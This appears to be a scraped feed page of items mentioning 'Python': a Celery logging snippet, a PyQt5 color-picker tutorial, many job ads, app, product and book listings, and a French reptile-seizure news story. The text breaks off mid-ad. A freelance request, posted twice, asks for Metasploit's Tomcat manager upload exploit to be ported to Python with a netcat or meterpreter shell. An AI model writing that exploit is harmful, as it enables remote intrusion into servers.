            self.get_current_task = get_current_task
        except ImportError:
            self.get_current_task = lambda: None

    
    def format(self, record):
        task = self.get_current_task()
        if task and task.request:
            record.__dict__.update(task_id=task.request.id,
                                   task_name=task.name)
        else:
            record.__dict__.setdefault('task_name', '')
            record.__dict__.setdefault('task_id', '')
        return super().format(record)

logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))
logger.setLevel(logging.INFO)
logger.addHandler(sh)

This custom TaskFormatter works with logging.getLogger. It imports celery._state.get_current_task if celery is present, otherwise not. If it runs inside a Celery worker process, it injects the task id and the task name, otherwise not. It just works.


          Catalin George Festila: Python Qt5 - QColorDialog example.      Cache   Translate Page      
Today I will show you how to use the QColorDialog and clipboard with PyQt5.
You can read documentation from the official website.
This example used a tray icon with actions for each type of code color.
The code of color is put into clipboard area and print on the shell.
I use two ways to get the code of color:
  • parse the result of currentColor depends by type of color codel;
  • get the code of color by a special function from QColorDialog;
To select the color I want to use is need to use the QColorDialog:

Let's see the source code:
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *

# create the application
app = QApplication([])
app.setQuitOnLastWindowClosed(False)

# get the icon file
icon = QIcon("icon.png")

# create clipboard
clipboard = QApplication.clipboard()
# create dialog color
dialog = QColorDialog()

# create functions to get parsing color
def get_color_hex():
if dialog.exec_():
color = dialog.currentColor()
clipboard.setText(color.name())
print(clipboard.text())

def get_color_rgb():
if dialog.exec_():
color = dialog.currentColor()
clipboard.setText("rgb(%d, %d, %d)" % (
color.red(), color.green(), color.blue()
))
print(clipboard.text())

def get_color_hsv():
if dialog.exec_():
color = dialog.currentColor()
clipboard.setText("hsv(%d, %d, %d)" % (
color.hue(), color.saturation(), color.value()
))
print(clipboard.text())
# create function to use getCmyk
def get_color_getCmyk():
if dialog.exec_():
color = dialog.currentColor()
clipboard.setText("Cmyk(%d, %d, %d, %d, %d)" % (
color.getCmyk()
))
print(clipboard.text())


# create the tray icon application
tray = QSystemTrayIcon()
tray.setIcon(icon)
tray.setVisible(True)

# create the menu and add actions
menu = QMenu()
action1 = QAction("Hex")
action1.triggered.connect(get_color_hex)
menu.addAction(action1)

action2 = QAction("RGB")
action2.triggered.connect(get_color_rgb)
menu.addAction(action2)

action3 = QAction("HSV")
action3.triggered.connect(get_color_hsv)
menu.addAction(action3)

action4 = QAction("Cmyk")
action4.triggered.connect(get_color_getCmyk)
menu.addAction(action4)

action5 =QAction("Exit")
action5.triggered.connect(exit)
menu.addAction(action5)

# add the menu to the tray icon application
tray.setContextMenu(menu)

app.exec_()

          Mid SOC Analyst - XOR Security - Fairmont, WV      Cache   Translate Page      
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, Powershell scripts.). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
          Senior Python Developer / Team Lead - Chisel - Toronto, ON      Cache   Translate Page      
Chisel.ai is a fast-growing, dynamic startup transforming the insurance industry using Artificial Intelligence. Our novel algorithms employ techniques from...
From Chisel - Mon, 22 Oct 2018 13:32:48 GMT - View all Toronto, ON jobs
          Senior Software Engineer - Python - Tucows - Toronto, ON      Cache   Translate Page      
Flask, Tornado, Django. Tucows provides domain names, Internet services such as email hosting and other value-added services to customers around the world....
From Tucows - Sat, 11 Aug 2018 05:36:13 GMT - View all Toronto, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener-Waterloo, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client overview:....
From Indeed - Wed, 10 Oct 2018 18:08:25 GMT - View all Kitchener-Waterloo, ON jobs
          Senior Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client Overview:....
From Integrity Resources - Wed, 10 Oct 2018 23:19:39 GMT - View all Kitchener, ON jobs
          Python Software Engineer - PageFreezer - British Columbia      Cache   Translate Page      
Experience using web framework such as Tornado with Python. Python Software Engineer....
From PageFreezer - Mon, 05 Nov 2018 06:09:49 GMT - View all British Columbia jobs
          Easy FTP Pro      Cache   Translate Page      
Category: Utilities
Latest version: 7.8
Size: 74.30 MB

Easy FTP Pro for iPhone and iPad offer all the features of a desktop client. Make changes to your website from anywhere!! Includes text editor with color coding: html, php, perl, python.. and printing, images and documents viewer, extract ZIP, 7-zip and RAR files, web browser, audio player, mp4,avi,... video player ,Dropbox, Google Drive, OneDrive, Box, Mega and WebDAV, also helps you to access files on your remote computer (Mac, Windows, Linux), NAS Servers, and more...

Video demo: http://www.youtube.com/user/jrmobileapps

Main Feature list:
√ Bookmarks, export and import them in a xml file or Import Filezilla bookmarks.
√ Support: FTP/FTPES/FTPS/SFTP.
√ Save and get pictures or videos from the Photo Library, also upload them directly to a server.
√ Includes text editor with color coding: html, perl, python...
√ Web Browser with multiple tabs, Bookmarks, Download files, Modify the type of browser detected...
√ WebDAV: download nad upload files and folders, rename, create folders, view photos...
√ Dropbox, Google Drive, OneDrive, Box, Mega: Upload and download files and folders, rename, create folders, file sharing, view photos...
√ Computer shared files (SMB). Upload and download files, access with credentials, photo viewer...
√ Include a console to see the FTP commands sent and received from the server.
√ 3D touch support: Peek at documents, photos and Audio files, Quick Actions for FTP/SFTP bookmarks.
√ FXP: connect to two servers at a time and transfers files between them (some servers may not support it).
√ Support for Split-Screen Multitasking on iPad*
√ Search and open files from spotlight.
√ Support for pip when playing MP4 and MOV files on iPad*.
*some devices

• FTP
√ Support SSL/TSL over FTP (explicit or implicit mode). Support TLS session resumption.
√ Support list format in UNIX and Windows server.
√ Support file list with different text encodings.
√ Delete or create folders, delete folders with files and folders inside.
√ Download and Upload folders.
√ Search files and folders.
√ Set one or more files permission.
√ Support for PRET.
√ Send Commands.

• SFTP
√ Browse, upload, download, delete and rename from any SFTP server.
√ Download, upload, delete or create folders.
√ Search files and folders.
√ Set one or more files permission.
√ Send SSH Commands.

• Viewers
√ Word,Excel,Powerpoint,Numbers,Pages,documents:rtf,txt,c,h...
√ PDF viewer with paging, zoom, bookmarks, page preview...
√ Includes an image viewer and image editor with zoom and tools to crop, resize, and rotate.
√ Audio Player that displays the cover, also artist, title, genre and album.
√ Video player that support: avi, divx, xvid, wmv, mpg, mkv, flv, mov, mp4, m4v, 3gp. Suport srt subtitle files and audio track selection.

• Compression tools
√ Unzip zip and 7zip files, also password protected files.
√ Make new ZIP archives with the stored files.
√ Decompress RAR files, including multipart and password protected files.

• Text Editor
√ Supports 30 different text encodings, also auto-detect encoding.
√ Newline character management, auto-detect included: Windows or Linux/MAC/UNIX.
√ Color coding and printing.
√ Ability to edit text files from the server with the editor and re-upload your changes.
√ Unknow files can be opened as text.

• File Manager
√ Open, Rename, Move, Delete, Create Folder, sort files,...
√ Displays thumbnail of images, video, and song’s covers.
√ Supports downloading attachments from mail app.
√ App can Save and Open files with other apps.

• Sharing
√ Share access to the stored files from a web browser, also upload files.
√ FTP server.
√ you can protect the access with a password.
√ USB File Sharing via iTunes.
√ Email Files as Attachments.

• Other Features
√ A pin code, pattern or Touch ID can be set to restrict the access to the application.

For more details visit: www.jrmobileapps.com
Twitter: @jrmobileapps
Facebook: JR mobile Apps
Youtube: jrmobileapps

          Systems Automation Engineer      Cache   Translate Page      
TX-Plano, 2+ years' experience with Public Cloud environments utilizing Linux Strong experience with monitoring and logging tools (ELK, AppDynamics, Dynatrace, DataDog, Nagios, etc) Some scripting/automation experience (Bash, Python, PowerShell, etc) Fundamental understanding of modern cloud architecture (VMs, Database, message queues) Understanding of Web Services technologies (REST, SOAP) Great troublesho
          Data scientist      Cache   Translate Page      
Looking for someone to contribute to an ongoing project as data analyst. You are expected to be having experience on machine learning and deep learning modules using Python. Minimum 4 hours a days is needed to be spent on the project... (Budget: ₹100 - ₹400 INR, Jobs: Data Mining, Machine Learning, Python, Software Architecture, Statistics)
          Arras : 311 espèces d'animaux saisies au Reptile Day      Cache   Translate Page      

Dimanche, tous les passionnés de reptiles étaient présents au Reptile Day, à Saint-Laurent-Blangy, près d’Arras, dans le Pas-de-Calais. Ils ne s'attendaient pas à trouver les agents de l'ONCFS qui étaient également sur place... Mais pas pour les mêmes raisons ! Ces derniers se sont emparés de 311 spécimens, soit quarante espèces ! Certaines tellement rares que leur valeur est inconnue. Des serpents, des caméléons, des tortues, des araignées ont été saisis car non autorisés à la vente.

Des sanctions engagées 

Sanctions et procédures judiciaires ont été appliquées à l'encontre des vendeurs. Six procédures d'ampleur engagées contre les coupables. On leur reproche de ne pas avoir de certificats de capacité ni de d'autorisations d'ouverture d'établissements. Les vendeurs étaient tous de nationalités étrangères : belges, hongroises, hollandaises et anglaises. 

Avec l'arrivée des nouveaux animaux de compagnie (NAC), l'ONCFS a du évoluer face aux dérives. Mais alors quels types d'espèces recherchent-ils ? Ismaël Costa, chef des brigades CITES en France (Convention sur le commerce international des espèces de faune et de flore sauvages menacées d’extinction) répond à la question.

"Le monde de la détention animale s’est beaucoup développé, il faut que ce soit encadré. Nous, on vient vérifier que des espèces interdites à la vente ne sont pas vendues". 

Les agents se concentrent en priorité sur les espèces dangereuses et invasives, comme les tortues d'eau de Floride ou encore certains serpents. Exemple du python reculé, serpent dangereux qui nécessite une autorisation spéciale. Pour ce qui est des grenouilles, certaines peuvent produire des substances venimeuses voire hallucinogènes rien qu'en les touchant. 


          Jimmy Choo JC121 Glasses in Havana Python      Cache   Translate Page      
Jimmy Choo JC121 Glasses in Havana Python

Jimmy Choo JC121 Glasses in Havana Python

Frame Colour Havana Python Lens Colour Clear Lens Size 52 Filter Category 0 Total UV Protection


          Custom payload script metasploit      Cache   Translate Page      
Hello, i need the Metasploit payload exploit/multi/http/tomcat_mgr_upload to be in python (with a simple shell like netcat or meterpreter) (Budget: €8 - €30 EUR, Jobs: Java, Linux, Python, Software Architecture, Ubuntu)
          Odoo System Development      Cache   Translate Page      
I want to generate Custom monthly Invoice (qWeb) at the Payroll module , and this Invoice must depends on some custom fields (Budget: $30 - $250 USD, Jobs: ERP, Python)
          Custom payload script metasploit      Cache   Translate Page      
Hello, i need the Metasploit payload exploit/multi/http/tomcat_mgr_upload to be in python (with a simple shell like netcat or meterpreter) (Budget: €8 - €30 EUR, Jobs: Java, Linux, Python, Software Architecture, Ubuntu)
          Odoo System Development      Cache   Translate Page      
I want to generate Custom monthly Invoice (qWeb) at the Payroll module , and this Invoice must depends on some custom fields (Budget: $30 - $250 USD, Jobs: ERP, Python)
          #6: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 39.49

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          #10: Programming: C ++ Programming : Programming Language For Beginners: LEARN IN A DAY! (C++, Javascript, PHP, Python, Sql, HTML, Swift)      Cache   Translate Page      
Programming
Programming: C ++ Programming : Programming Language For Beginners: LEARN IN A DAY! (C++, Javascript, PHP, Python, Sql, HTML, Swift)
Os Swift

Buy new: CDN$ 2.99

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Integrations Specialist - OnShift, Inc - Cleveland, OH      Cache   Translate Page      
Experience with Microsoft Server and Task Scheduler a plus. Advanced trouble shooting using SQL, Python, and advanced Excel is highly desired....
From OnShift, Inc - Thu, 20 Sep 2018 16:25:59 GMT - View all Cleveland, OH jobs
          (USA-CA-Los Angeles) Sr Product Manager - eCommerce/Startup      Cache   Translate Page      
Sr Product Manager - eCommerce/Startup Sr Product Manager - eCommerce/Startup - Skills Required - Product Management, Product Strategy, ECommerce, Team Leadership & Management, Data Analysis, Agile, Startup, SQL, Python If you are a Senior Product Manager with at least 5 years of eCommerce & Startup experience, read on! Based out of Los Angeles, we are a company focused on improving the well being of our customers and women everywhere. Our revolutionary products are on track to disrupt a billion dollar industry & we want people committed to creating positive change and making a difference to join our team. **Top Reasons to Work with Us** 1. Get in on the ground floor of a fast-growing startup! 2. We are committed to making a difference & our culture reflects that! 3. Work with a team that values individual ideas & collaboration! **What You Will Be Doing** As Senior Product Manager, you will be responsible for developing & driving product strategy, overseeing product roadmap, collaborating with and leading cross-functional teams with focus on using data-driven strategies and research methods to improve overall user experience & help optimize product. **What You Need for this Position** A Bachelor's Degree and more than 5 Years of experience and knowledge of: - Product Management - Product Strategy - ECommerce - Team Leadership & Management - Data Analysis - Agile Bonus points if you have experience with: - Startups - SQL - Python **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k - Equity So, if you are a Senior Product Manager with at least 5 years of experience, apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr Product Manager - eCommerce/Startup* *CA-Los Angeles* *ZC1-1492862*
          (USA-VA-Herndon) Full Stack Scala Engineer: JavaScript | Responsive Web Apps      Cache   Translate Page      
Full Stack Scala Engineer: JavaScript | Responsive Web Apps Full Stack Scala Engineer: JavaScript | Responsive Web Apps - Skills Required - JavaScript, Scala, Responsive Web Apps, Math, Modeling, JVM, Python, SPARK, Angular, Liftweb If you're an experienced Full Stack Scala Engineer, please read on! We apply artificial intelligence to solve complex, real-world problems at scale. Our Human+AI operating system, blends capabilities ranging from data handling, analytics, and reporting to advanced algorithms, simulations, and machine learning, enabling decisions that are just-in-time, just-in-place, and just-in-context. If this type of environment sounds exciting, please read on! **Top Reasons to Work with Us** - Benefits start on day 1 - Free onsite gym - Unlimited snacks and drinks - Located 1 mile from Wiehle-Reston East Station on the Silver line **What You Will Be Doing** RESPONSIBILITIES: - Design and develop code, predominantly in Scala, making extensive use of current tools such as Liftweb and Scala.js. - Developing state-of-the-art analytics tools supporting diverse tasks ranging from ad hoc analysis to production-grade pipelines and workflows for customer applications - Contributing to key user interactions and interfaces for tools across our modular SaaS platform - Developing tools to improve the ease of use of algorithms and data science tools - Working collaboratively to ensure consistent and performant approaches for the entire user experience and analytic code developed inside the system - Interacting directly with client project team members and operational staff to support live customer deployments **What You Need for this Position** QUALIFICATIONS: - Bachelor's Degree - Expert knowledge of Scala - Experience on full-stack software development teams - Expert knowledge of Javascript, HTML and CSS - Experience with responsive web applications - Experience with tools including Scala.js, Grunt, Bower, Liftweb - Advanced mathematical modeling skills - Experience with Akka, Akka HTTP, and Spark **What's In It for You** - Competitive Salary - Incentive Stock Options - Medical, Dental & Vision Coverage - 401(K) Plan - Flexible “Personal Time Off (PTO) Plan - 10+ Paid Holiday Days Per Year So, if you're an experienced Full Stack Scala Engineer, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Scala Engineer: JavaScript | Responsive Web Apps* *VA-Herndon* *WT1-1492870*
          Python Programmer Needed      Cache   Translate Page      
Need a Python Programmer for longterm. New freelancers are most welcome. (Budget: $30 - $250 USD, Jobs: Java, Javascript, Programming, Python, Software Architecture)
          (USA-NM-San Jose) Sr. Validation Engineer      Cache   Translate Page      
Sr. Validation Engineer Sr. Validation Engineer - Skills Required - Validation / System Testing, Python, Shell, Perl, Automation Testing, I/o Testing, Windows / Linux, RTOS, Network Package Capture and Analysis Tools, Version Control If you are a Sr. Validation Engineer with system testing experience, please read on! Located in beautiful San Jose, CA, we are a global company that is developing revolutionary tech in the autonomous and electric vehicle space. We are incredibly well-funded and are seeing continued growth and investments, everyone wants a piece of this pie! We employ the newest technologies and methodologies when developing self-driving cars. due to our incredible growth, we are in need of a Sr. Validation Engineer to join our team of elite engineers. **What You Will Be Doing** - Develop automation stations, tools and techniques in order to improve test coverage - Hardware and Software subsystem testing - Find critical gaps, create solutions for continuous integration - Improve operating efficiency - Create and maintain test plans, test reports, and test dashboards - Interacting with internal development and product teams to influence testability of the product - Testing and debugg complex product configurations - Mentor and train others in validation **What You Need for this Position** - 5+ years in a Validation or System Test Engineer role - BSCS or BSEE or related - Quality Assurance - Strong Scripting skills (Python, Shell, Perl, etc.) - Automation Testing (designing frameworks) - I/O, Hardware, and Software testing - experience testing in Windows / Linux / Android / RTOS - Network Package Capture and Analysis Tools (Wireshark) - Version Control Nice to have: - QNX - CANoe - CAN - Experience with testing in Automotive industry - Vehicle Network **What's In It for You** - Competitive Salary - Great Benefits - Generous PTO - Much more! So, if you are a Sr. Validation Engineer - QA with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr. Validation Engineer* *NM-San Jose* *TR3-1493038*
          (USA-NJ-Princeton) Data Analyst      Cache   Translate Page      
Data Analyst Data Analyst - Skills Required - Data Analysis, Python, SQL, C/C++, Statistical Software (R/Python/SAS/SPSS/SQL), Python/R, Data Analyst, Excel, Matlab, SPSS If you are a Data Scientist with experience, please read on! Located in Princeton, NJ, our leaders have been in the industry for over 30 years. We have created a platform that assists companies both large and small by analyzing consumer behavior and improving marketing tactics. **What You Will Be Doing** -Extracting and analyzing data and creating reports -Searching our large database to create customer prospecting models -Statistical modeling and regression analysis **What You Need for this Position** - Master's Degree in Statistics, Marketing Analytics, or related field STRONGLY preferred, Bachelor's Degree required - 3+ years practical experience with statistical analysis, and/or marketing/business analytics - Python - SQL - C/C+- Excel - Matlab - SPSS **What's In It for You** - Competitive salary ($75K-$110K DOE) - Excellent benefits package, 401k, PTO, and a FSA - Located near public transit - Opportunity to grow within the team So, if you are a Data Scientist with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Analyst* *NJ-Princeton* *TK3-1492884*
          Web scrapping 3 sites      Cache   Translate Page      
Hello, I have 3 sites to automate Need expert on scrapping to do some steps automated with ability to work on Linux and windows Saving data on text files and show process statics for each process (Budget: $10 - $100 USD, Jobs: Data Mining, Linux, Python, Software Architecture, Web Scraping)
          Werkstudent (m/w/d) Software Entwicklung für Innovation Department      Cache   Translate Page      
Jobangebot: Mehr Infos und bewerben unter: https://www.campusjaeger.de/jobs/8583?s=18111178+ Was erwartet dich? * Du wirst komplett in unser Team integriert. * Du arbeitest zusammen im Team, mit erfahrenen Kollegen, die dir mit Rat zur Seite stehen. * Du arbeitest in einem kreativen Office Space in einem baden-badner Altbau * Du kommst mit einer großen Bandbreite von Themen und Technologien in Berührung+ Was solltest du mitbringen? * Du belegst einen Studiengang aus den Bereichen Informatik / Wirtschaftsinformatik / Mathematik * Du verfügst über grundlegende Programmier-Skills, z.B. in Java, Python, SQL oder JavaScript wären ... 0 Kommentare, 38 mal gelesen.
          (USA-WA-Seattle) Senior Software Engineer      Cache   Translate Page      
Senior Software Engineer Senior Software Engineer - Skills Required - AWS, Python, SaaS, Distributed Systems If you are a Senior Software Engineer with experience, please read on! Based in downtown Seattle, we are a progressive technology company that specializes in SaaS, brand compliance, and paid search monitoring. If you are interested in joining an exciting company that pushes the envelope in the SaaS industry, encourages continuous growth and learning for our employees, and definitely cares about providing a great and collaborative working environment for its employees, then please apply today! **Top Reasons to Work with Us** - Competitive salary - 401K w/ company match - Stock and ownership opportunities!! - Competitive Benefits (Medical, Dental, Vision) - Unlimited PTO/Vacation days - Flexible work schedule and hours - Option to work from home 1-2 days a week - Opportunity to learn new technologies and skills - Work in a fun, collaborative, and employee-centered environment - Have the opportunity to have make an impact and have a say in the company - Orca pass **What You Will Be Doing** - Tackle complex data storage and access problems - Mentor engineers under you - Work in a collaborative team setting - Collect and filter data - Code using Python - Use distributed systems and AWS - Perform data scaling tasks **What You Need for this Position** - 5+ years of professional experience - AWS - SaaS - Distributed Systems - Python STRONGLY preferred **What's In It for You** - Competitive salary - UNLIMITED VACATION - Medical - Dental - Vision - Stock/Equity options - Work from home 1-2 times/ week - Growth opportunities - 401k - Life insurance So, if you are a Senior Software Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer* *WA-Seattle* *ST3-1493001*
          (USA-TX-Austin) Robotics Application Engineer - PLC, C++, Python      Cache   Translate Page      
Robotics Application Engineer - PLC, C++, Python Robotics Application Engineer - PLC, C++, Python - Skills Required - PLC, C++, Python, ROS, Gazebo, Vrep, Linux, Bash If you are a Robotics Application Engineer with experience, please read on!( Austin, TX) The Application Systems Engineer acts as a customer facing engineer and an automation technical consultant to Stocked Robotics customers, and is responsible for determining requirements, product selection, customer operational recommendations, running on-site deployments and integrating SIERA AI into customer workflows. **Top Reasons to Work with Us** -Health, Dental, Vision and Life Insurance -Generous vacation and sick leave policy -Unlimited soda, snacks and coffee -Pizza Friday socials -Company BBQs around our beautiful city of Austin! **What You Will Be Doing** - Understand customer needs for future feature developments, generate requirements documents, and drive to completion among application engineering, product management and engineering teams - Develop, document, and implement applications for Stocked Robotics customers - Develop clear and concise proposed description of non-recurring engineering labor and materials for special customer requests - Prepare diagrams and simulations for cross-disciplinary communication of proposed systems - Support sales staff with the determination of customer requirements and automated material handling solutions using Stocked Robotics products - Travel to customer sites as needed (20-30%) to study and gather information critical to the overall system - Determine external control requirements for proposed vision guided vehicle systems (i.e. WMS, WCS, MES, etc.) - Propose and prototype PLC logic and integration **What You Need for this Position** - 3+ years work experience - Proficiency in Linux, Bash, Robot Operating System - Proficiency in C++ & Python with atleast 3+ years of experience, ROS / Gazebo / VREP simulation experience a plus - Excellent written and oral communication skills - Demonstrated ability to evaluate customer needs and problems and translate them into comprehensive sales proposal materials - Self-starter who works well in high pressure situations **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Robotics Application Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Robotics Application Engineer - PLC, C++, Python* *TX-Austin* *SL5-1492779*
          (USA-CA-San Jose) Lead Machine Learning Software Engineer - up to 220k + bonus      Cache   Translate Page      
Lead Machine Learning Software Engineer - up to 220k + bonus Lead Machine Learning Software Engineer - up to 220k + bonus - Skills Required - Machine Learning, Deep Learning, Natural Language Processing, Computer Vision, Programming with languages such as Python/C/Java, Full lifecycle experience Location: Work remote initially, once established office will be either Redwood City OR San Jose. Will need to be in the office 2-3 days per week minimum. Salary: Up to 220k base plus bonus Skills: Machine learning, full lifecycle experience, programming with a variety of languages Work for an industry leader which is one of the largest consumer products brands around the globe! It's an exciting time for our brand as we continue to move forward with our digital/IoT strategy. If you are a Lead Machine Learning Software Engineer please read on........ **Top Reasons to Work with Us** - Work for an industry leading consumer products brand - Excellent benefits including 401k contribution, bonuses and much more..... - Excellent work/life balance and positive company culture **What You Will Be Doing** As the Lead Machine Learning Engineer you will be very hands on defining and delivering solutions which will bring delightful user experiences globally. Key responsibilities: - Work with a cross functional team which is developing products for consumers across the globe - Utilize machine learning, computer vision, NLP and speech recognition techniques to create innovative products - Be the SME for Machine Learning in our product group - Stay abreast of the latest machine learning techniques and technologies and advise the company on how they can be applied to our products - Architect and implement smart IoT products - Mentor more junior engineers - Participate in code reviews **What You Need for this Position** Required: 5+ years in software engineering Strong Machine learning skills Programming with languages such as Python, C and Java Ideally you will have experience with at least some of these specific areas: computer vision, speech recognition, natural language processing **What's In It for You** Market rates salaries (150-220k) plus bonus and full benefits package! So, if you are a Lead Software Engineer that specializes in Machine Learning, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Lead Machine Learning Software Engineer - up to 220k + bonus* *CA-San Jose* *SJ2-LeadML-SJ*
          (USA-PA-Pittsburgh) Computer Vision / Deep Learning Engineer      Cache   Translate Page      
Computer Vision / Deep Learning Engineer Computer Vision / Deep Learning Engineer - Skills Required - Computer Vision, C++, Caffe, Tensorflow, Lidar, Geometry-Based Vision, Deep Learning, Multi-view stereo I am currently working with several companies in the area who are actively hiring in the field of Computer Vision and Deep Learning. AI, and specifically Computer Vision and Deep Learning are my niche market specialty and I only work with companies in this space. I am actively recruiting for multiple levels of seniority and responsibility, from experienced Individual Contributor roles, to Team Lead positions, to Principal Level Scientists and Engineers. I offer my candidates the unique proposition of representing them to multiple companies, rather than having to work with multiple different recruiters at an agency, or applying directly to many different companies without someone to manage the process with each of those opportunities. In one example, I am working with a candidate who is currently interviewing with 10 different clients of mine for similar roles across the country with companies applying Computer Vision and Deep Learning to various different applications from Robotics, Autonomous Vehicles, AR/VR/MR, Medical Imaging, Manufacturing Automation, Gaming, AI surveillance, AI Security, Facial ID, 3D Sensors and 3D Reconstruction software, Autonomous Drones, etc. I would love to work with you and introduce you to any of my clients you see as a great fit for your career! Please send me a resume and tell me a bit about yourself and I will reach out and offer some times to connect on the phone! **Top Reasons to Work with Us** Some of the current openings are for the following brief company overviews: Company 1 - company is founded by 3x Unicorn (multi-billion dollar companies) founders and are breaking into a new market with advanced technology, customers, and exciting applications including AI surveillance, robotics, AR/VR. Company 2 - Autonomous Drones! Actually, multiple different companies working on Autonomous Drones for different applications - including Air-to-Air Drone Security, Industrial Inspection, Consumer Drones, Wind Turbine and Structure Inspection. Company 3 - 3D Sensors and 3D Reconstruction Software - make 3D maps of interior spaces using our current products on the market. We work with builders, designers, Consumers and Business-to-Business solutions. Profitable company with strong leadership team currently in growth mode! Company 4 - Industrial/Manufacturing/Logistics automation using our 3D and Depth Sensors built in house and 3D Reconstruction software to automate processes for Fortune 500 clients. Solid funding and revenue approaching profitability in 2018! Company 5 - Hand Gesture Recognition technology for controlling AR/VR environments. We have a product on the market as of 2017 and are continuing to develop products for consumers and business applications that are used in the real and virtual world. We have recently brought on a renowned leader in Deep Learning and it's intersection with neuroscience and are doing groundbreaking R&D in this field! Company 6 - Full facial tracking and reconstruction for interactive AR/VR environments. Company 7 - massively scalable retail automation using Computer Vision and Deep Learning, currently partnered with one of the largest retailers in the world. Company 8 - Products in the market including 3D Sensors, and currently bringing 3D reconstruction capabilities to mobile devices everywhere. Recently closed on a $50M round of funding and expanding US operations. Company 9 - Mobile AI company using Computer Vision for sports tracking and real time analytics for players at all levels from beginner to professional athletes to track, practice and improve at their craft. Company 10 - Digitizing human actions to create a massive new dataset in manufacturing - augmenting the human/robot working relationship and giving manufacturers the necessary info to improve that relationship. We believe that AI and robotics will always need to work side by side with humans, and we are the only company providing a solution to this previously untapped dataset! Company 11 - 3D facial identification and authentication for security purposes. No more key-fobs and swipe cards, our clients use our sensors and software to identify and permit employees. **What You Will Be Doing** If you are interested in discussing any of these opportunities, I would love to speak with you! I am interested in learning about the work you are currently doing and what you would be interested in for your next step. If the above opportunities are not quite what you're looking for but would still like to discuss future opportunities and potential to work together, I would love to meet you! I provide a free service to my candidates and work diligently to help manage the stressful process of finding the right next step in your career. The companies that I work with are always evolving so I can keep you up to date on new opportunities I come across. Please apply to this job, or shoot me an email at richard.marion@cybercoders.com and let's arrange a time to talk on the phone. **What You Need for this Position** Generally, I am looking for Scientists/Engineers in the fields of Computer Vision, Deep Learning and Machine Learning. I find that a lot of my clients are looking for folks who have experience with 3D Reconstruction, SLAM / Visual Odometry, Object Detection/Recognition/Tracking, autonomy, Point Cloud Processing, Software and Algorithm development in C++ (and C++11 and C++14), GPU programming using CUDA or other GPGPU related stuff, Neural Network training, Sensor Fusion, Multi-view stereo, camera calibration or sensor calibration, Image Segmentation, Image Processing, Video Processing, and plenty more! - Computer Vision - C+- Python - Linux - UNIX **What's In It for You** A dedicated and experienced Computer Vision placement specialist! If you want to trust your job search in the hands of a professional who takes care and pride in their work, and will bring many relevant opportunities your way - I would love to work with you! So, if you are a Computer Vision Scientist or Engineer and are interested in having a conversation about the market and some of the companies I am working with, please apply or shoot me an email with resume today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is 